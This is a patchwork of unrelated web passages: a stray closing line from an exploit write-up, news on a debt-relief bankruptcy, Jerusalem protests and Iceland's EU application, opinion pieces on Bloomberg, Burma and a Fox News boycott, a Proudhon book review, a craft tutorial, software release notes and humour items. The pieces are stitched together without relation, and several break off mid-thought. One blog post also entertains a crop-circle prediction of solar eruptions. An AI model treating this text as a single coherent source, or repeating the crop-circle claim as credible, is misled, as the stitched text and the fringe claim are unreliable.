And then reach out shellcode :)
Finally , because of the post is very long , so I try to create a picture that demonstrates the flow of instructions and the purpose of them .
It may be help you understand the concept of this exploit .
Debt Relief USA , also called No Debt USA , could n't seem to help itself .
The debt - consolidation company filed for Chapter 11 bankruptcy protection in June with $ 5 million in total liabilities and only $ 4.65 million in assets .
Not only has the company filed for Chapter 11 , it has completely shut down , leaving customers out of luck .
" One of the unfortunate consequences is that you are left without the service you have paid for , " its Web site now reads , directing current clients to reach out to their own attorneys .
The company site also reported that it faces investigations from the Federal Trade Commission and by the Attorneys General of several states .
NEXT : Recession hits newspapers
The advantages of being homeless …
We read with intrigue in the NY Times today about a policy that Bloomberg has been using to deal with homelessness in New York City .
Faced with the increasing costs of taking in families that have hit the wall Bloomberg wants to let you know that he still he cares about you and your family .
With shelter costing up to $ 36 000 per annum for a family Bloomberg and his crew have devised a ‘ fun ’ way of dealing with your unsavory fate .
They will fly you back where you came from on the house .
Assuming you have someone who will vouch for you and let you stay with them Bloomberg and crew will wait a few days ( so as not to pay top dollar for air fare vouchers ) and get you as far as is politically expedient for Mike Bloomberg .
Granted there are probably some of those who are happy to just call it a day and be spared the ignominy of having to live in the shelter system , and struggling with a city that does n’t give much unless you ’re photogenic , well groomed , connected and just plain lucky to manage the housing and employment equation .
The question that arises for us is whatever happened to attacking the central issues that have led to people ending up homeless ?
What kind of culture do we live in when we shuffle those less fortunate than us on a one way ticket while kissing and making out with the glam and celebrity factor ?
Mike - let us just say for the record we wont be endorsing you for your third , fourth term ( when does it stop ? ) unless of course you fly us out to a return trip to our choice of locale , frills and balloons included .
By the way Mike you need n’t come with us either .
Cosmetic surgery for a wound that keeps bleeding unabated .
The smart things politicians do so you can live in a ‘ fun ’ part of town …
In a film of startling power and unsettling intimacy - produced exclusively for wallpaper.com - video artist and photographer Robbie Cooper shoots back at active porn aficionados lost in ecstatic release and hears how their passion developed .
Be aware that this is not easy titillation and some of you may find the footage shocking .
But the film does throw up any number of questions about voyeurism and exhibitionism and makes clear the incredible nakedness of the solo sex act .
This film is part of Cooper ’s on - going Immersion series , for which he captures people ’s reactions to different media via a camera attached to their screen .
The artist has now launched a Kickstarter campaign to help him take the series global .
Read more about the project .
Carefully dribble glue gun glue into both ends of the wand ( one at a time , waiting till each end is set ) .
For the bigger of the two ends , you can pack the end with a little rolled up tissue pushed down a bit with a pencil so that you do n't have to use too much glue .
For the bigger end you will probably need to have two goes .
If you are careful you can achieve a rounded end , as the glue is setting make sure that you rotate the wand to stop it slumping to one side or dripping over the edge .
The same goes for the little end , although if you have wound the wand tightly enough , you will not need to fill this twice .
NOTE if you want your wand to be stiff and very robust , then instead of using the tighter rolled up paper core , you can fill it with epoxy resin .
Epoxy resin is that sort of glue that you use by mixing up two parts .
It can be very runny when mixed up , so you will need to plug the smaller end .
After plugging the little end , but before plugging the big end , fill the wand with quick setting , two part epoxy resin .
Use the 5 minute setting version rather than the really fast 90 second version and carefully dribble the glue down the inside of the wand , making sure not to get it on the outside .
Do n't worry
If you do get a little bit on the outside though , just wipe it off carefully and quickly , you 'll be painting over that later .
Great American Spice Co .
MSRP : Now : $ 7.99 - $ 633.54 Was :
Getting that great bacon flavor is now easier than ever with our Bacon Powder .
If you do n't have time to sizzle up some bacon or are thinking of making a last minute adjustment to your meal , Bacon ...
The farcical trial of Aung San Suu Kyi , combined with the intensification of the offensive against Karen civilians , must surely be a wake - up call for those who have not previously heard the sirens ring .
Than Shwe is not a man with whom we can simply have a nice chat .
Significant pressure , far from being a cause of his intransigence , is the only language he understands .
Sanctions , rather than being lifted , need to be tightened and more carefully targeted , to hit Than Shwe and his cronies .
The United Nations Security Council must impose a universal arms embargo , and the European Union – which has at last issued a statement condemning the offensives in eastern Burma – should lead the charge .
UN Secretary - General Ban Ki-moon should make the release of political prisoners in Burma his personal priority , as called for in a petition signed by almost 700,000 people .
And it is time to treat Than Shwe as the war criminal that he is , and hold a commission of inquiry into crimes against humanity , as called for by two previous UN special rapporteurs .
Such steps should be given the sense of urgency the situation deserves , by invoking the UN ’s ‘ Responsibility to Protect ’ mechanism .
That would be the most appropriate way of marking Aung San Suu Kyi ’s birthday .
JULY 15 -- As Senator Al Franken today prepares to question Supreme Court nominee Sonia Sotomayor , we 're reprising a letter that the newest Judiciary Committee member once wrote to the head of George W. Bush 's Justice Department .
In a missive to Attorney General John Ashcroft , the comedian once claimed to be writing a book on abstinence and asked Ashcroft to ' share a moment when you were tempted to have sex , but were able to overcome your urges through willpower and strength of character .
Be funny !'
Franken , who claimed to have already received personal abstinence stories from other Bush administration officials for ' Savin ' It , ' his purported book , also asked Ashcroft , ' Did a young woman ever think you were homosexual just because you would n't have sex with her ?
Be serious !'
Franken 's letter to Ashcroft can be found here .
Franken eventually wrote Ashcroft to apologize for his ' imprudent attempt at satire , ' which was written on letterhead from Harvard University 's John F. Kennedy School of Government , where the comedian was a fellow .
( 2 pages )
General Idea of the Revolution in the Nineteenth Century
Pierre - Joseph Proudhon
Pluto Press , 1989 ( Translated by John Beverly Robinson ( 1923 ) )
This year marks the 200th anniversary of Proudhon ’s birth , the person who first used the word “ anarchist ” in a positive light .
This was in his 1840 book What is Property ?
so making anarchism as a named socio-economic theory and movement 170 years old next year .
While not as famous as he once was , Proudhon was during his lifetime and for sometime after one of the world ’s leading socialist thinkers .
Kropotkin became a socialist after reading Proudhon , while Bakunin was a friend and proclaimed his anarchism as simply “ Proudhonism widely developed and pushed right to these , its final consequences . ”
The General Idea was one of Bakunin ’s favourite Proudhon works ( along with the sadly untranslated account of the 1848 revolution in France , “ Les Confessions D'un Révolutionnaire ” ) .
Reading this classic of anarchism , it is easy to see why : it is the first constructive anarchist manifesto and raises such key libertarians ideas such as self - management , federalism , anti-statism and anti-capitalism .
Written in prison , in seven studies Proudhon sketches out the lessons of the events of 1848 and presents an alternative to save it and emancipate labour ( “ Capitalistic and proprietary exploitation , stopped everywhere , the wage system abolished ” ) .
Needless to say , Proudhon spends some time addressing issues specific to 1851 France .
However , there is much material within this work which is directly relevant to our situation in the 21st century and for libertarian alternatives to our capitalistic and statist oppression .
Its Epilogue contains his justly famous and widely quoted rant against government :
“ To be governed is to be kept in sight , inspected , spied upon , directed , law - driven , numbered , enrolled , indoctrinated , preached at , controlled , estimated , valued , censured , commanded , by creatures who have neither the right , nor the wisdom , nor the virtue to do so ....
To be governed is to be at every operation , at every transaction , noted , registered , enrolled , taxed , stamped , measured , numbered , assessed , licensed , authorized , admonished , forbidden , reformed , corrected , punished .
It is , under the pretext of public utility , and in the name of the general interest , to be placed under contribution , trained , ransomed , exploited , monopolized , extorted , squeezed , mystified , robbed ; then , at the slightest resistance , the first word of complaint , to be repressed , fined , despised , harassed , tracked , abused , clubbed , disarmed , choked , imprisoned , judged , condemned , shot , deported , sacrificed , sold , betrayed ; and , to crown all , mocked , ridiculed , outraged , dishonoured .
That is government ; that is its justice ; that is its morality . ”
This is one of the many joys in the book .
All , though , need to be read to fully understand Proudhon ’s thought .
For example , while “ The Principle of Association ” sees him oppose “ Association ” it becomes clear from reading “ The Organization of Economic Forces ” that he was against the kind of centralised and compulsory “ Association ” of state socialist Louis Blanc and not against workers ’ associations running industry :
“ Thus we need not hesitate , for we have no choice .
In cases in which production requires great division of labour , and a considerable collective force , it is necessary to form an assocation among the workers in this industry ; because without that , they would remain related as subordinates and superiors , and there would ensue two industrial castes of masters and wage - workers , which is repugnant to a free and democratic society . ”
So when workers form co-operatives “ the importance of their work lies , not in their petty union interests , but in their denial of the rule of capitalists , money lenders and governments . ”
There would be free access to the means of life , with land , workplaces and housing becoming communal property and possessed and run by those who use them , either individually ( for agriculture and artisans ) or collectively ( for industry ) .
Proudhon also critiques the state and its centralisation , refuting attempts to reform rather than abolish the state ( “ No authority , no government , not even popular , that is the Revolution ” ) .
He advocates a radically decentralised and self - governing society of associations ( “ In place of laws , we will put contracts --
No more laws voted by a majority , nor even unanimously ; each citizen , each town , each industrial union , makes its own laws ” ) .
He was well aware that the state was not neutral , that it existed to defend capitalism ( “ Laws !
We know what they are , and what they are worth !
Spider webs for the rich and powerful , steel chains for the weak and poor , fishing nets in the hands of the Government . ” ) .
He calls for the masses to transforms society from the bottom - up , by their own efforts and organisations .
While Proudhon is sometimes accused of racism ( thanks to a few anti-Semitic rants in his private notebooks ) , this is absent from his published works and so we find him proclaiming that there “ will no longer be nationality , no longer fatherland , in the political sense of the words : they will mean only places of birth .
Man , of whatever race or colour he may be , is an inhabitant of the universe ; citizenship is everywhere an acquired right . ”
In this area , as in many others , this book will make enlightening reading for anyone who thinks they know Proudhon from the stereotyping inflicted upon him by Marxists ( starting with Marx ’s incredibly spiteful and usually inaccurate attack on him in “ The Poverty of Philosophy ” ) and those who read the secondary material influenced by such distortions .
While the reader will , rightly , question Proudhon ’s reformism and his free credit panacea it becomes obvious why the likes of Bakunin , Kropotkin and Rocker thought so highly of the Frenchman and what modern anarchism owes him for many of its defining ideas and concepts .
Robert Graham ’s introduction is excellent , giving a good summary of the Frenchman ’s life and ideas .
As far as the translation goes , Robinson systematically translates “ commune ” as “ town ” and “ salariat ” as “ wage system . ”
Both are flawed , as “ commune ” can represent any habitation from hamlet to cities while “ salariat ” is better translated as “ wage - labour ” as Proudhon was in favour of distribution according to deed rather than need .
Salariat specifically refers to a class of workers hired by a boss in return for a wage , i.e. , wage - workers or wage - slaves .
So , all in all a classic book which I think all anarchists will find of interest .
I know that I was pleasantly surprised by his arguments against wage - labour and for workers ’ self - management , his arguments against the state and for decentralisation and free federation and a host of other ideas which are nowadays usually associated with the revolutionary anarchism inspired by Bakunin and Kropotkin .
Like his author , this work is not without flaws but it is a key text in anarchist thought and in the evolution of anarchism .
It still has lessons for us seeking revolution in the 21st century .
Iain McKay
PS : I am currently working on a Proudhon anthology ( to be entitled “ Property is Theft ! ” ) to be republished next to mark the 170th anniversary of the use of anarchist in a positive light .
If you wish to contribute to the translation of material from French to English , please contact me at : anarchistfaq [ at] yahoo.co.uk
I am just as annoyed by public spaces that force
Fox propaganda on me and other unsuspecting citizens , as anyone , and I heartily encourage people to let the establishment know that changing the channel is a precondition for continued patronage .
But this action will have negligible effect on Fox or the viewing public .
Out of home viewing is not measured by the Nielsen Co .
No one will know that the venue changed channels except you and the assistant manager with whom you spoke .
And public TVs simply are n't numerous enough to impact viewers .
At best this is feel good measure ( and it does feel good ) , but it is hardly the solution that Keith asserts that it is .
Advertiser boycotts are a far more effective form of protest , even more effective than viewer boycotts because , unless you are a Nielsen family , your viewing choices are not measured .
But there is an even more effective action that we can all engage in now .
Just get all Democrats and progressives to ...
STAY THE HELL OFF OF FOX NEWS !
I have been making this case for three years now , and it long past time that our alleged representatives pay attention .
Here are some excerpts of my prior research and analysis into this proposal .
Form my original Starve The Beast , wherein I argued that it is not only pointless to appear on Fox News , but it is overtly harmful :
Stop the Masochism
First and foremost , it would put an end to the unnecessary submission to assaults from disreputable smearcasters with demonstrably hostile intentions .
Bill O’Reilly is the premium model for such encounters .
It is impossible to win a debate with him because he does n’t care about winning .
He is only concerned with generating the sort of heat that fuels his ego and his ratings .
He only books three types of guests :
Those who agree with him ; those he can dominate ; and those he can exploit .
Do n’t be one of them .
The Sinking of Fox
The loss of Democrats as foils would transform the character of Fox ’s conflict - driven programming , resulting in less controversy and , hence , lower ratings .
Viewers would quickly become bored with repeated appearances by Fred Barnes , Michelle Malkin , Dick Morris , and Geraldo Rivera .
Minus the shoutfests , and the potential for on - air meltdowns , there is no reason to watch Fox .
Neil Cavuto is already whining about his inability book A - list Democrats , and O’Reilly has made it a staple of his program to lambaste no -shows as cowards .
That ’s a desperation move on his part because he knows he can’t force guests into his inquisitor ’s lair .
When the entertainment value of Fox disappears , so will its audience , its ratings , and its cache in the media .
Deprive Fox of Bragging Rights
One of the most galling traits of Fox personalities is the way they use their ratings to validate their disinformation agenda .
But even if the ratings story were n’t a myth as described here , they still have a flawed argument .
McDonald ’s is the # 1 restaurant in America .
I do n’t think that anyone interprets that to mean that they have the best food .
What they have is the cheapest crap that is loaded with filler and seasoning to appeal to the largest number of consumers with the least sophisticated taste ( Hey , that ’s a pretty good description of Fox News ) .
Absent their ratings victories , however , they ca n’t even make this flawed argument .
Affirm Fox ’s Lack of Credibility
The mere act of not showing up sends a message that Fox is not deserving or reputable .
By sequestering
Fox they will be left to themselves and their minions to dispense their McNews .
It will make it that much more obvious to observe how they are attempting to denigrate their ideological opponents and to manipulate popular opinion .
Encourage More Responsible Journalism
By using discretion when formulating a media strategy , Democrats can strike a blow in favor of a more honest and independent press .
It does not further the goals of ethical journalism to accommodate deceitful practitioners .
Conversely , it does advance such goals to purposefully engage media who adhere to higher standards .
What ’s bad for Fox is good for journalism .
Rupert Murdoch and his rightist platform for propaganda must not be further appeased .
All previous efforts to abate the influence of Fox News have failed because they generally reserved a place for Fox in the effort .
This has to stop .
It ’s time to go cold turkey .
Starve The Beast
The solution is obvious .
Democrats and progressives have got to swear off Fox News .
They must decline all interviews .
They must stay off of that tainted air .
They must avoid the Stuttering Jesse ’s ( Watters , O’Reilly ’s producer ) that are resorting to ambush interviews .
They must continue to refuse to participate in Foxic events like debates or forums .
And if they find themselves trapped in an appearance from which they cannot escape , they must be certain to pepper their remarks with the truth about Fox .
Let the audience know that this network is degrading public discourse and leading viewers astray .
And do n’t let the bullies steer the dialog .
Progressive politicians and pundits must be called upon to heed this advice .
It is more than just a request .
It is an obligation .
Every time one of our representatives appears on Fox , they are setting back our agenda .
They are not just wasting a little time trying to confront the enemy in its lair .
They are literally causing harm to the efforts of the rest of us who are fervently struggling to repair and improve our country .
Anyone in our political provinces who betrays our mission by succumbing to the Fox siren should be firmly scolded and educated as to the damage they are inflicting .
In Starve The Beast : Appetite For Distortion , I expanded on the theme with data that confirmed the senselessness of accommodating Fox :
When nine out of ten
Fox viewers say that they will vote for John McCain , you have an audience that may be more accurately described as a cult ( as I described it in The Cult Of Foxonality ) .
And while viewers at both CNN and MSNBC express a solid two to one majority for Barack Obama , that is a far cry from the near unanimous , block mentality of Fox viewers .
[...]
In the first half of 2008 , CNN and MSNBC both improved their ratings over the same period the year before by more than 50 % in the key 25 - 54 year old demographic .
Fox News squeaked through with a measly 4 % gain .
In the second quarter Fox actually sunk 2 % .
And Fox continues to draw the oldest audience in cable news .
MSNBC beats
Fox with about 35 % more viewers in the 18 - 34 demo .
So Fox ’s audience is not only growing slower than its competitors , it is failing to attract the next generation of news viewers .
The only reason for the size of the audience they presently have is that they have cornered the market for conservative couch jockeys who congregate at their cable water cooler .
Hence their dramatic overweighting of McCainiacs .
The evidence that an embargo of Fox by Democrats and progressives works is illustrated by impact of our boycott of Fox during the presidential primaries last year .
In Starve The Beast : The Wrath Of The Right , I demonstrated that impact with hard data .
I also showed that Fox News was becoming an even less hospitable venue over time .
Last year , prior to the election , Fox News was already fortifying its right flank .
New multimillion dollar contracts were handed out to Roger Ailes , Sean Hannity and Bill O’Reilly .
Hannity ’s show shed the dead weight of alleged liberal Alan Colmes .
Glenn Beck was brought in to shore up the daytime crowd .
Neil Cavuto , a bully who is every bit as obnoxious as O’Reilly poisons the economic news , and he is also managing editor of Murdoch ’s Fox Business News .
And just this week Bill Sammon , author of a shelf full of bitterly partisan books , was promoted to VP and Washington Editor for the network .
The result is a full court press of some of the dirtiest political assaults ever waged by what is advertised as a " news " network .
Fox News is shamelessly pushing a campaign to characterize Obama as a Socialist - a committed opponent of America and its values - from 6:00 am with the crew of Fox & Friends , to after midnight with broadcasts and repeats of their primetime neanderthal shoutcasters .
They get their marching orders directly from Rupert Murdoch who last September said that ... " [ Obama 's ] policy is really very , very naive , old fashioned , 1960 ’s socialist . "
Even worse , these rightist dissidents come very close to openly advocating acts of violence and armed rebellion .
[...]
Democratic candidates , you may recall , had forsworn Fox News as a host for their debates .
So the two Democratic debates held in February 2008 were carried by CNN and MSNBC , and both drew audiences many times greater than their regularly scheduled programming .
Democrats also shunned Fox for other TV appearances and interviews .
It had gotten so bad that Chris Wallace , host of Fox News Sunday , made a veiled threat in December of 2007 : " I think the Democrats are damn fools [ for ] not coming on Fox News . "
We know the problem [ of Fox 's ratings weakness ] still existed in March of 2008 because that ’s when Wallace debuted his Obama Watch : a clock that would record how long before Obama appeared on Wallace ’s show .
It was a childish prank on Wallace ’s part , but it clearly showed that the Democratic embargo of Fox News was having a real impact .
For CNN and MSNBC , who had the guests and the event programming that appealed to the most motivated news consumers , it meant higher ratings .
Fox , on the other hand , had depressed numbers because their most loyal audience - Republicans - already had a candidate , so there was no campaign drama to keep them tuned in .
Make no mistake about it - Fox 's business model is conflict .
Their talk - radio inspired format thrives on producing the sort of melodrama that keeps their glassy - eyed constituency tuned in to see who gets slimed next .
It is utterly irresponsible for us to enable these perpetrators of slander who are focused exclusively on our defeat and humiliation .
If there were a pool of persuadable viewers , we might be able to justify the inherent risks of showing up at a Fox studio .
That is simply not the case .
The overwhelming majority of people who watch Fox do so to have there preconceptions reinforced .
They are not seeking reasoned debate and they are not likely to change their minds when confronted with facts .
By refusing to be willing victims , we can not only prevent the inevitable harm that comes from subjugating oneself to an abuser , but we can hit them where it really hurts - in their ratings and their revenue - not to mention their pride .
So in light of the above , It is important to let your representatives know that you regard their appearances on Fox News as a betrayal to our cause .
And , similarly , tell any pundits , reporters , or analysts that you cannot support them when they support the enemy by accepting invitations to go on Fox News .
We must not let those on our side who are fortunate enough to have a voice in the media , waste it , and harm us , by kowtowing to Fox .
2009 -06-10 - Dusty Phillips
After publishing the article discussing a misuse of our old logo in the June Newsletter , I received an unexpected e-mail from the operator of the company in question .
He has made a formal apology and has removed the logo from his website .
We thank him for his compliance and wish him well in designing a new logo to represent his company .
Apparently he received several vulgar and threatening e-mails in response to this issue .
I am very disappointed that this has occurred ;
The Arch Linux community prides itself on its friendliness among other things and individuals who identify themselves as members should be above this sort of behaviour .
I did not intend to motivate such actions , and I hope that those responsible will act more maturely in the future .
SWEARING can lessen the feeling of physical pain , scientists have discovered .
Volunteers withstood pain for longer when they swore compared with when they used anodyne words , in a study at Keele University in the English Midlands .
Dr Richard Stephens , who led the study at the university 's school of psychology , believes it may explain why most languages contain swear words .
" It could be part of the flight or fight response , " Dr Stephens said .
" The volunteers who swore had an elevated heart rate , so it could be increasing their aggression levels .
Please turn on JavaScript .
Media requires JavaScript to play .
Advertisement Ultra-Orthodox Jews in Jerusalem have clashed with police in protest at what they see as interference by the Israeli authorities in their community .
Police said at least 28 people were arrested after protesters threw stones at officers and burned rubbish bins .
Hundreds of police have been deployed - 10 were reported to have been injured .
The incidents followed the arrest of an ultra - orthodox woman for allegedly starving her three - year - old son deliberately .
The child is in hospital .
The protests are taking place in two ultra-Orthodox neighbourhoods , Mea Shearim and Bar - Ilan .
There were later reports of unrest in Beit Shemesh , a few miles outside Jerusalem , where police broke up a group of about 100 protesters attempting to block a road into the town .
It is time someone woke up because the violence threatens to cause victims
Police chief Aaron Franco
There were also reports of stone - throwing attacks on municipal workers .
" Thousands of ultra-orthodox from the Mea Shearim district tried to close a main road to traffic , obliging law enforcement to intervene with water cannons , " said police spokesman Shmuel Rubi .
" Some police officers were hurt when stones were thrown " and police questioned dozens of people , he told the AFP news agency .
On Thursday , police used horses and water cannon to disperse the black - garbed Haredim .
Police spokesman Micky Rosenfeld said the violence was " something that was not expected " .
Meanwhile the city 's police chief , Aaron Franco , has said ultra - orthodox rabbis are not doing enough to denounce the violence .
" It is time someone woke up because the violence threatens to cause victims , " he said .
Car park row The Haredim say the authorities are intruding on their way of life Jerusalem is home to large Orthodox communities whose strict adherence to Jewish law sometimes puts them at odds with more the majority secular Jews .
Anger is high at what has been seen as the " unjust " arrest of the mother , who is said to be suffering from a mental disorder .
A hospital spokeswoman , Yael Bossem - Levy , was quoted by the Associated Press as saying the woman had Munchausen syndrome by proxy , a condition in which one person mimics or induces illness in another .
Another current Haredi grievance has been the Sabbath opening of a private car park near the religiously sensitive Old City area , when Orthodox Jews abstain from work .
Bookmark with : Delicious
Digg
reddit
Facebook
StumbleUpon
What are these ?
E-mail this to a friend Printable version
Carl Bildt said Iceland would enhance the EU's " Nordic dimension " Iceland has formally applied to join the European Union , a week after the parliament in Reykjavik voted in favour of accession to the 27 - nation bloc .
The Icelandic Foreign Minister , Ossur Skarphedinsson , submitted the request to his Swedish counterpart , Carl Bildt , during a ceremony in Stockholm .
Sweden currently holds the EU 's rotating six - month presidency .
The bid must now be approved by the EU , after which Iceland 's people will be asked to vote on it in a referendum .
" This is the day when I have the historic duty to hand in formally the Icelandic application to the European Union , " Mr Skarphedinsson said at the ceremony in the Swedish foreign ministry on Thursday .
ICELAND'S EU BID 16 July : Parliament backs bid by slim majority 23 July : Bid submitted to Swedish EU Presidency February 2010 : Entry talks may begin Late 2011 / early 2012 : Bid goes to popular referendum 2013 : Earliest date Iceland can realistically join Source : Arni Thor Sigurdsson , chairman of Icelandic parliamentary committee on EU Mr Bildt said that having Iceland within the EU would enhance its " Nordic dimension " .
Correspondents say Iceland , with a population of just 320,000 , has traditionally been sceptical about joining the EU .
Some fear EU quotas could hurt Iceland 's fishing industry .
But many people there have warmed to the idea of membership following the devastating economic meltdown , which saw the top Icelandic banks collapse in a matter of days last year .
Iceland already has close ties with Europe , being part of the European Economic Area ( EEA ) and the Schengen Area .
Arni Thor Sigurdsson , the chairman of the parliamentary committee handling EU issues , told the Reuters news agency last week he believed Iceland would not be ready to join any earlier than 2013 , with a referendum due in late 2011 or early 2012 .
Bookmark with : Delicious
Digg
reddit
Facebook
StumbleUpon
What are these ?
E-mail this to a friend Printable version
The Machine That Changed The World ( Documentary )
Tweet Description : " The Machine That Changed the World is the longest , most comprehensive documentary about the history of computing ever produced .
It 's a whirlwind tour of computing before the Web , with brilliant archival footage and interviews with key players — several of whom passed away since the filming .
Jointly produced by WGBH Boston and the BBC , it originally aired in the UK as The Dream Machine before its U.S. premiere in January 1992 .
Its broadcast was accompanied by a book co-written by the documentary 's producer Jon Palfreman . " -
The full blog entry is available here .
Here 's the entire five - part series , The Machine That Changed the World .
Enjoy !
Tags : fun ,
Disclaimer :
We are a infosec video aggregator and this video is linked from an external website .
The original author may be different from the user re-posting / linking it here .
Please do not assume the authors to be same without verifying .
-----BEGIN PGP SIGNED MESSAGE -----
Hash : SHA1 I2P release 0.7.3 =====================
I2P version 0.7.3 contains several buxfixes and improvements , includes a lot of maintenance work and new versions of both the SAM and BOB application gateway protocols .
A patch to I2P 's internal web server Jetty is included to correct SusiDNS behaviour on Windows .
The way I2P nodes volunteer to participate in the Network Database is changed to avoid too many doing this simultaneously , and creation of new participating tunnels is now throttled before messages in existing tunnels start to get dropped .
Multiple improvements to the Router Console and other components are included , I2 PSnark can handle bigger torrents and more files , while work continues on the experimental desktop interface .
Updating is recommended .
As customary , for people who do n't have the option of checking GPG signatures , supplied below are the SHA1 hashes of released files : 267cca04edd2ebf41adc0cfcfde8d1784df58bad i2 pheadless-0.7.3.tar.bz2 4f096812bdb7ab86be36ce16590dbd7d0e2c7d12 i2 pinstall-0.7.3.exe 3632f6c7c6d7165dafb992a5d39bc32969c061cb i2psource-0.7.3.tar.bz2 a3ca23ae3cbee273f27aea8e525b4958c41171fd i2pupdate-0.7.3.zip cec64fbae310898b129570d1d88e1bd215af5f20 i2pupdate.sud
Best wishes , Complication .
-----BEGIN PGP SIGNATURE ----- Version : GnuPG v1.4.9 ( GNU / Linux ) iEYEARECAAYFAkoPIBIACgkQ+h38a3n8zjN8nQCfbLp5i+SyXMnwhVAMwl9rYtOK
Cy0An372IlJMf/E+dHE9ssiH4DoTi57q =7SfN -----END PGP SIGNATURE -----
One of our local regular readers , Cruxshadows , brought forth some interesting information and a question .
A crop circle in England predicts 5 massive solar eruptions which will affect the earth .
Now , these Coronal Mass Ejections , were to begin yesterday .
But , the crop circle forecast does fall within the time frame of the noted increase in solar activity cycle .
If this does occur , then there will be great interest to see how the plasma reacts with a breach in the earth ’s magnetosphere , which was found by NASA in December of last year .
Of course , there ’s no word on how the crop circles got there in the last ten days of June .
The crop circle caper seems to mesh quite nicely with this report yesterday of the largest sunspot ever witnessed
It also fits in with the idea that , with the sun ’s 11 year cycle , we are in a period of increased solar activity with the peak not expected until 2013 .
Here ’s the problem .
NASA reports the exact opposite .
It claims in its 3 day forecast from yesterday that solar activity was “ very low ” and that “ no x-ray flares were observed during the past 24 hours . ”
It predicts that solar activity will remain very low .
So the question on the table from Cruxshadows is , do we believe the government ( NASA ) or do we believe those who interpret the crop circles ?
Do we believe NASA ’s report that nothing much is going on or do we believe the report of Wappa Falls Observatory claiming that so much is going on that “ the flares have been so bright that NASA has had trouble taking accurate pictures of the sunspot . ”
I ’ve found other stories about the Australian observatory ’s claims , but there seems to be a disconnect .
I suppose we ’ll find out the veracity of the crop circle prediction and the Wappa observations soon enough .
But Cruxshadows wants to know whom to believe ?
The government , the Australian astronomers or the Crop Circle ?
Two things to note .
The Wappa Falls Astronomical Observatory in Australia does n’t seem to have a website , which seems a bit odd in the 21st century .
Further , the stories that I ’ve found seem to come from the same source .
Hoax ?
maybe .
Guess we ’ll have to wait and see .
I question why NASA would cover this up or how they could make such a mistake ?
It does n’t make sense , to me .
I have an old friend .
Let ’s just call him “ F ” . “ F ” once pondered how men did n’t really get into the scene , if you know what I mean , when a man and woman in a movie shoot a sex scene .
I suppose the idea of professionalism gets tossed out in “ F ’s ” world .
But , you gotta admit , some of those scenes , even on the soap operas , can get pretty steamy .
Maybe too steamy for some viewer ’s taste .
Anyway , it seems that actor Ryan Reynolds was given a little insurance that he did n’t get to worked up during a nude scene with Sandra Bullock in his recent movie , The Proposal .
Ryan Reynolds wore cellophane underwear .
A Louisiana man was arrested after a 72 year old woman called the police after she heard noises and saw someone in her backyard going into her shed .
The Alexandria Town
Talk reports the man was clad only in his undies when the police clapped the old bracelets on him when they witnessed him trying to break into the woman ’s house .
Maybe he was looking for some hand - me - downs .
Meanwhile , in Britain , the recession is hitting hard .
So hard , in fact , that people apparently are n’t going out on the town so much .
So , people are having to improvise .
Lingerie and “ racy underwear ” sales are up over 50 % since the recession began .
Not sure who took the time to find out that odd statistic .
I guess it gives a new meaning to “ a cheap date . ”
On This Date in History : THIS MAN WAS SAVED BY ANOTHER MAN’S UNDERWEAR !!!
John Wesley Powell was a self - taught geologist and naturalist who had lost his right arm at the Battle of Shiloh .
He is credited with charting the Grand Canyon and went on to lead the US Geological Survey and Bureau of American Ethnology .
When making what would be the first trip through the Grand Canyon with a 9 man party down the Colorado River , they stopped to do some surveys .
On this date in 1869 , the one armed Powell and George Bradley gingerly moved along a shear cliff when Powell made a short leap and found himself stuck with no where to go .
Bradley was above him and tried to find a branch or something to extend to Powell , whose legs and one hand were giving out .
Quick thinking ensued .
Bradley stripped off his long underwear and lowered them down .
Bravely , Powell let loose with his hand and quickly grabbed the dangling drawers .
The fabric held , Powell was pulled to safety and he lived to tell about it and map the Grand Canyon .
If this story happened today , can you imagine the commercials ?
“ Acme Longjohns … .
So tough it saves lives ! ”
Weather Bottom Line : Remember that I mentioned the boundary sagging down our way and potentially bringing some insignificant showers here ?
Well , I was n’t too enthused about the prospects so Snow White and I ventured out to do some sculling yesterday afternoon and it was wonderful , though I got a little overheated .
Had a headache all night .
Well , it just so happens that the airport reported .01 ″ of rain this morning !
Aha !
Vindicated .
But who cares , right ?
Other than that little bit of information , everything else is on line .
Upper 80 ’s today , maybe a stray afternoon t’storm .
Upper 80 ’s tomorrow .
Low 90 ’s Friday and Saturday with maybe an errant storm on Saturday with activity more likely on Sunday as another front tries to make its way our direction .
The true story of Christopher Boyce , a young All - American man whose job as a guard for sensitive documents shatters his faith in his country and leads him to a sometimes comic , sometimes chilling sideline as a spy for the Soviets , aided by his scruffy buddy , Daulton ; it can't last , though , and the consequences are tremendous for Boyce and his family .
Written by Dan Hartung < dhartung@mcs.com >
Tonight , we hit a milestone in the Review Board project that we ’ve been working toward for over two years .
We finally pushed out our 1.0 release .
A lot of blood , sweat and tears went into this release ( okay , so not literally , but it was A LOT OF WORK ! ) .
The last few months in particular have been challenging , as we ’ve had to solve some tricky bugs and scalability problems , but the end result is pretty great .
Just a short while ago , we announced the release and put up an overview of the entire release and product .
We ’ve already had some nice congratulatory e-mails and tweets , which is really nice 🙂
Some stats for this release :
2 years , 9 months , 25 days have passed since our first commit .
120 contributors have contributed to Review Board so far ( in terms of code contributions ) .
2,019 commits were made .
899 review requests have been posted to our project ’s actual Review Board server .
1,650 users are registered on there .
Our demo server , in comparison , has 2,082 review requests filed and 10,154 users .
938 bugs were filed .
812 were fixed .
232 feature requests were filed .
101 were implemented .
Most remaining ones are scheduled for releases .
An estimated 200 + companies are now using Review Board .
26 have let us list them publicly .
The largest known Review Board install has over 83,000 filed review requests and over 2,000 users , doing upwards of 10 GB of traffic per day .
5 presentations on Review Board are known to have been given , 3 by us , 2 by others .
552 users have joined our main mailing list , and 3,674 e-mails have been sent .
Now that Review Board 1.0 is out , we can get started on some awesome new features we ’ve had planned .
I have a little notebook full of ideas for our 1.1 and 1.5 releases ( which may become 1.5 and 2.0 , respectively , as this list grows ) .
Some of the new features are actually ready to be committed within the next couple of days , so those of you using nightlies will start to see them soon .
We were accepted into this year ’s Summer of Code , and have three students working on exciting projects for us , so hopefully we ’ll start to see these trickle into the upcoming nightlies as well .
Among these projects include diff viewer improvements ( moved region detection , better whitespace - only change detection ) , IDE integration with Eclipse , and improved notification hooks and e-mail support .
We ’re also working on providing support for third - party extensions , which will allow developers to extend Review Board in new , exciting ways without having to modify Review Board itself .
This is especially handy for companies who wish to integrate better with their sandboxes , bug trackers or unit testing services .
This will likely land in 1.5 ( 2.0 ? ) at the earliest , as it ’s a large change , but the code for this mostly works today .
It ’s just a matter of getting the codebase ready and figuring out what APIs we want to stabilize and expose .
